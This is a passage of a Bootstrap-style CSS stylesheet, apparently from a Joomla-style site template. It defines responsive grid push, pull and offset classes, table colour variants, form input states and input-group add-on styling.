    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
table col[class*="col-"] {
  position: static;
  float: none;
  display: table-column;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  float: none;
  display: table-cell;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  overflow-x: auto;
  min-height: 0.01%;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0px;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0px 0px 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0px 0 0 0px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0px 0 0 0px;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0px 0px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
